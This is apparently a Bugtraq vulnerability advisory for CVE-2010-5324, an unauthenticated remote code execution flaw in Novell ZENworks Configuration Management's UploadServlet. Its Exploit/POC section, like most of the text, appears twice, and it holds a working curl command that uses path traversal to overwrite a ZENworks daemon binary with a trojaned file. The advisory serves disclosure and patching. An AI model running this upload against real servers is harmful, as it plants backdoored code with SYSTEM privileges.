Novell ZENworks Configuration Management 'UploadServlet' Remote Code Execution Vulnerability
BID:39114
Info
Novell ZENworks Configuration Management 'UploadServlet' Remote Code Execution Vulnerability
| Bugtraq ID: | 39114 |
| Class: | Unknown |
| CVE: |
CVE-2010-5324 |
| Remote: | Yes |
| Local: | No |
| Published: | Mar 30 2010 12:00AM |
| Updated: | Jul 15 2015 12:24AM |
| Credit: | Stephen Fewer of Harmony Security via TippingPoint's Zero Day Initiative |
| Vulnerable: |
Novell ZENworks Configuration Management 10.1.2 a Novell ZENworks Configuration Management 10.1.2 Novell ZENworks Configuration Management 10.1 |
| Not Vulnerable: |
Novell ZENworks Configuration Management 10.3 |
Discussion
Novell ZENworks Configuration Management 'UploadServlet' Remote Code Execution Vulnerability
Novell ZENworks Configuration Management is prone to a remote code-execution vulnerability.
An attacker can leverage this issue to execute arbitrary code with SYSTEM-level privileges. Failed exploit attempts will result in a denial-of-service condition.
Versions prior to ZENworks Configuration Management 10.3 are vulnerable.
Novell ZENworks Configuration Management is prone to a remote code-execution vulnerability.
An attacker can leverage this issue to execute arbitrary code with SYSTEM-level privileges. Failed exploit attempts will result in a denial-of-service condition.
Versions prior to ZENworks Configuration Management 10.3 are vulnerable.
Exploit / POC
Novell ZENworks Configuration Management 'UploadServlet' Remote Code Execution Vulnerability
An attacker can exploit the issue via a browser.
The following proof-of-concept and exploit code are available:
$ curl -ivkl 'http://www.example.com/zenworks-fileupload/?type=application/octet-stream/../../../../../../../opt/novell/zenworks/bin/&filename=daemon-monitor&overwrite=true' --data-binary @./daemon-monitor.troyanizado -H "Content-Type: application/octet-stream"
An attacker can exploit the issue via a browser.
The following proof-of-concept and exploit code are available:
$ curl -ivkl 'http://www.example.com/zenworks-fileupload/?type=application/octet-stream/../../../../../../../opt/novell/zenworks/bin/&filename=daemon-monitor&overwrite=true' --data-binary @./daemon-monitor.troyanizado -H "Content-Type: application/octet-stream"
Solution / Fix
Novell ZENworks Configuration Management 'UploadServlet' Remote Code Execution Vulnerability
Solution:
Updates are available; please see the references for more information.
Solution:
Updates are available; please see the references for more information.
References
Novell ZENworks Configuration Management 'UploadServlet' Remote Code Execution Vulnerability
References:
References:
- PdC de ZDI-10-078 (tucanalamigo)
- Security Vulnerability with ZCM Remote Execution (Novell)
- ZDI-10-078: Novell ZENworks Configuration Management UploadServlet Remote Code E (Zero Day Initiative)
- ZENworks Configuration Management Homepage (Novell)